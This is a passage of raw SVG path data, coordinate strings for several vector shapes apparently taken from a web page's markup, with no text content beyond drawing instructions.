.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path 